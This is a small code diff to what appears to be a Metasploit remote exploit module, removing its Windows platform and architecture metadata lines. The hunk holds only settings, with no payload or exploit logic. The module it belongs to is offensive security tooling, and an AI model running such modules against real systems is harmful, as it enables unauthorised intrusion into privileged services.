@@ -59,8 +59,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'RPORT' => 443,
           'SSL' => true
         },
-        'Platform' => ['windows'],
-        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
         'Privileged' => true,
         'Targets' => [
           [
